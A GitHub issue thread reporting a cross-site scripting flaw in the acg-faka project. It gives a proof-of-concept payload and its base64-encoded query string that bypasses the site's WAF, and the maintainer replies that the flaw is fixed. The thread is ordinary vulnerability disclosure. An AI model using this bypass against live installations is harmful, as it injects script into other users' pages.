### ISSUE TITLE
There is an xss vulnerability in app/Controller/User/Index.php

### ISSUE THREAD

**Issue by N0boy-0** [lizhipay/acg-faka#72]
Get the base64 encode parameter in Index.php, which can successfully bypass the WAF and cause it to be rendered on the page.
![xss1](https://github.com/lizhipay/acg-faka/assets/63273184/d0f713f3-ab54-4422-bb59-61ffbb7d9b59)
![xss2](https://github.com/lizhipay/acg-faka/assets/63273184/d48b905c-cebf-4796-93a3-fc96e9ce38e0)
payload: a=";alert(123);"&b=";alert(123);"
We need to base64 encode the payload as a parameter. 
/?code=YT0iO2FsZXJ0KDEyMyk7IiZiPSI7YWxlcnQoMTIzKTsi
![xss3](https://github.com/lizhipay/acg-faka/assets/63273184/b6ee8134-3b9d-425e-93f8-c3393baa0b04)

**Comment by lizhipay** [comment]
已修复，感谢反馈。

**Comment by lizhipay** [comment]
希望能反馈更多漏洞。
